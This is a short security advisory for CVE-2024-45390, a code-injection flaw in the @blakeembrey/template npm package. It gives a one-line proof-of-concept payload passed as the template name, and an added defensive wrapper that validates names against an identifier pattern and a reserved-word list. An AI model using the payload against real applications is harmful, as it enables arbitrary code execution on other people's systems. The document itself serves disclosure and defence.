CVE-2024-45390: @blakeembrey/template vulnerable to code injection when attacker controls template input
An attacker who can control the template name (the second argument passed to `template()`) can inject arbitrary JavaScript that runs when the template is compiled.
const { template } = require('@blakeembrey/template');
template("Hello {{name}}!", "exploit() {} && ((()=>{ console.log('success'); })()) && function pwned");
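As an added defensive example (not the advisory's or the project's own code), the wrapper below rejects any template name that is not a plain identifier before it reaches the library's compile step; `isSafeTemplateName`, `safeTemplate` and the injected `compile` parameter are hypothetical names, and the advisory's payload is reused only as a rejection test.

```javascript
// Strict identifier shape: ASCII-only, deliberately narrower than the full
// ECMAScript grammar so nothing that could close the generated function body
// (parentheses, braces, operators, whitespace) is accepted as a name.
const SAFE_NAME = /^[A-Za-z_$][A-Za-z0-9_$]*$/;

// Reserved words match the identifier shape but are invalid as function names.
const RESERVED = new Set([
  "break", "case", "catch", "class", "const", "continue", "debugger", "default",
  "delete", "do", "else", "export", "extends", "finally", "for", "function", "if",
  "import", "in", "instanceof", "new", "return", "super", "switch", "this", "throw",
  "try", "typeof", "var", "void", "while", "with", "yield", "let", "static",
  "enum", "await", "implements", "package", "protected", "interface", "private",
  "public", "null", "true", "false",
]);

// Returns true only for strings that are safe to splice into generated source.
function isSafeTemplateName(name) {
  return typeof name === "string" && SAFE_NAME.test(name) && !RESERVED.has(name);
}

// `compile` stands in for the library's `template(source, name)` function and is
// injected so this example runs without the dependency installed (hypothetical
// wrapper). Untrusted names never reach the compiler; the call throws instead.
function safeTemplate(compile, source, name = "template") {
  if (!isSafeTemplateName(name)) {
    throw new TypeError(`unsafe template name rejected: ${JSON.stringify(name)}`);
  }
  return compile(source, name);
}

// Payload quoted from the advisory above, used here only to show it is refused.
const ADVISORY_PAYLOAD =
  "exploit() {} && ((()=>{ console.log('success'); })()) && function pwned";
```

Applying the same identifier check to every caller-supplied name turns a code-injection path into a rejected request that can be logged and alerted on.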